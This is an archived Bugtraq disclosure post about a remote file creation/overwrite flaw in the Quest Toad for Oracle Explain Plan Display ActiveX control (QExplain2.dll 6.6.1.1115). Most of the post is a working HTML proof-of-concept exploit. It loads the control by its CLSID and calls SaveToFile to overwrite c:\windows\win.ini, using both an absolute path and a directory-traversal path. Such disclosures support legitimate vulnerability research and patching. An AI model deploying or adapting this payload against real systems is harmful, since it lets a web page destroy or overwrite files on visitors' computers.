lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201204051219.q35CJs9Z000999@sf01web2.securityfocus.com>
Date: Thu, 5 Apr 2012 12:19:54 GMT
From: nospam@...il.it
To: bugtraq@...urityfocus.com
Subject: Quest Toad for Oracle Explain Plan Display ActiveX Control
 (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite

<!-- 
Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115)
Remote File Creation / Overwrite 

vendor site: http://www.quest.com/
file tested: Quest_Toad-Development-Suite-for-Oracle_110R2.exe

CLSID: {F7014877-6F5A-4019-A3B2-74077F2AE126}
Progid: QExplain2.ExplainPlanDisplayX
Binary Path: C:\PROGRA~1\COMMON~1\QUESTS~1\QEXPLA~1.DLL
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True

rgod
-->
<!-- saved from url=(0014)about:internet --> 
<html>
<object classid='clsid:F7014877-6F5A-4019-A3B2-74077F2AE126' id='obj' width=640 height=480 />
</object>
<script>
try{
obj.SaveToFile("c:\\windows\\win.ini");
}catch(e){
}

try{
obj.SaveToFile("../../../../../../../../../../windows/win.ini");
}catch(e){
}
</script>

original url: http://retrogod.altervista.org/9sg_quest_toad_poc.htm

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ